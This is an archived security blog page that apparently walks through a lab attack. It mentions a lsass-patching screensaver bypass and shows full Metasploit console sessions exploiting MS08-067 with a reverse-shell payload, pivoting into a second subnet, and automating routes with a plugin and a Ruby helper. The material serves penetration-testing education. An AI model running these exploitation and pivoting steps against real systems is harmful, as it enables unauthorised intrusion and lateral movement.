Archive for February, 2010

Passworded Screensaver Bypass

The Relentless-coding blog just released a script for meterpreter that bypasses password protection for screensavers in Windows XP (SP2 & SP3), Vista, and Windows 7. The script patches the lsass process (you’ll need SYSTEM-level permissions) to circumvent the password check. Once applied, any password typed into the lock screen will unlock it. PaulDotCom has a video on Vimeo demonstrating it.

Automatically Route Through New Subnets with Metasploit

One of the coolest features of any exploitation framework is the ability to further penetrate the network via the exploited host. Here is how to pivot an attack in Metasploit:


msf exploit(ms09_002_memory_corruption) > sessions -l

Active sessions
===============

Id  Description  Tunnel
--  -----------  ------
1   Meterpreter  192.168.1.109:8080 -> 192.168.1.104:62239

msf exploit(ms09_002_memory_corruption) > ifconfig
[*] exec: ifconfig

eth0      Link encap:Ethernet  HWaddr 00:0d:29:d9:ec:cc
          inet addr:192.168.1.109  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fee8:ebe7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14826 errors:12824 dropped:0 overruns:0 frame:0
          TX packets:6634 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:7542708 (7.5 MB)  TX bytes:2385453 (2.3 MB)
          Interrupt:19 Base address:0x2024

msf exploit(ms09_002_memory_corruption) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > route

Network routes
==============

Subnet           Netmask          Gateway
------           -------          -------
0.0.0.0          0.0.0.0          192.168.55.2
192.168.55.0     255.255.255.0    192.168.55.140
192.168.55.140   255.255.255.255  127.0.0.1
127.0.0.0        255.0.0.0        127.0.0.1
224.0.0.0        240.0.0.0        192.168.55.140
255.255.255.255  255.255.255.255  192.168.55.140

meterpreter >
Background session 1? [y/N]y

msf exploit(ms09_002_memory_corruption) > route add 192.168.55.0 255.255.255.0 1
msf exploit(ms09_002_memory_corruption) > route print

Active Routing Table
====================

Subnet        Netmask        Gateway
------        -------        -------
192.168.55.0  255.255.255.0  Session 1

msf exploit(ms09_002_memory_corruption) > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/patchupmeterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

Exploit target:

Id  Name
--  ----
0   Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 192.168.55.128
RHOST => 192.168.55.128
msf exploit(ms08_067_netapi) > set LPORT 9000
LPORT => 9000
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.109
LHOST => 192.168.1.109
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 Service Pack 2 - lang:English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (205835 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.1.109:9000 -> 192.168.1.104:62260)

meterpreter > execute -f cmd.exe -i
Process 3864 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32> ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection 6:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.55.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.55.2

C:\WINDOWS\system32>exit

meterpreter >
Background session 2? [y/N]y

The problem is that this requires a lot of typing. HD Moore has created a plug-in that automatically adds a route for any previously unseen subnet when a new session opens. Here is an example of its usage and output:


msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.128:2355)
[*] AutoAddRoute: Routing new subnet 192.168.1.0/255.255.255.0 through session 1

meterpreter > background
msf exploit(ms08_067_netapi) > route print

Active Routing Table
====================

Subnet       Netmask        Gateway
------       -------        -------
192.168.1.0  255.255.255.0  Session 1

msf exploit(ms08_067_netapi) >

Awesome…..
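To see what the plugin automates, here is an added example (my own code, not HD Moore's auto_add_route): it parses a meterpreter route listing like the one in the first session, drops the routes a pivot should never take over (default, host, loopback, multicast/broadcast and already-known subnets), and emits the same route add commands that were typed by hand above. The listing embedded in it is a constructed copy of that table.

```ruby
require 'ipaddr'

# Constructed sample of a meterpreter `route` listing, modelled on the one above.
SAMPLE_ROUTE_OUTPUT = <<~OUT
  Subnet           Netmask          Gateway
  ------           -------          -------
  0.0.0.0          0.0.0.0          192.168.55.2
  192.168.55.0     255.255.255.0    192.168.55.140
  192.168.55.140   255.255.255.255  127.0.0.1
  127.0.0.0        255.0.0.0        127.0.0.1
  224.0.0.0        240.0.0.0        192.168.55.140
  255.255.255.255  255.255.255.255  192.168.55.140
OUT

IPV4 = /\A\d{1,3}(\.\d{1,3}){3}\z/

# Parse the listing into [subnet, netmask] pairs; header/separator lines never match.
def parse_routes(text)
  text.each_line.filter_map do |line|
    subnet, mask = line.split
    [subnet, mask] if IPV4.match?(subnet.to_s) && IPV4.match?(mask.to_s)
  end
end

# Prefix length of a dotted-quad netmask, e.g. 255.255.255.0 -> 24.
def mask_bits(mask)
  mask.split('.').sum { |octet| octet.to_i.to_s(2).count('1') }
end

# Keep only subnets worth pivoting into: drop /0 (default), /32 (host routes),
# loopback, first octet >= 224 (multicast/reserved/broadcast) and known routes.
def routable_subnets(routes, existing = [])
  routes.filter_map do |subnet, mask|
    bits = mask_bits(mask)
    next if bits.zero? || bits == 32
    next if subnet.start_with?('127.') || subnet.split('.').first.to_i >= 224
    network = IPAddr.new("#{subnet}/#{bits}").to_s # zeroes any host bits
    next if existing.include?("#{network}/#{mask}")
    [network, mask]
  end
end

# The msfconsole commands a plugin would issue for a newly opened session.
def route_add_commands(session_id, route_output, existing = [])
  routable_subnets(parse_routes(route_output), existing).map do |subnet, mask|
    "route add #{subnet} #{mask} #{session_id}"
  end
end

puts route_add_commands(1, SAMPLE_ROUTE_OUTPUT)
```

The existing argument takes "subnet/netmask" keys already in the framework's route print table, so a second session into the same subnet adds nothing.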

GCIA

Thanks to Uncle Sam I will be taking the GCIA on the 27th of this month. Wish me luck, I doubt I will need it but I have heard that it is a ball buster. I’m pretty confident I have the material down, and I will be taking the practice tests soon so I will have a bit of time to bone up on anything that I’m lacking.
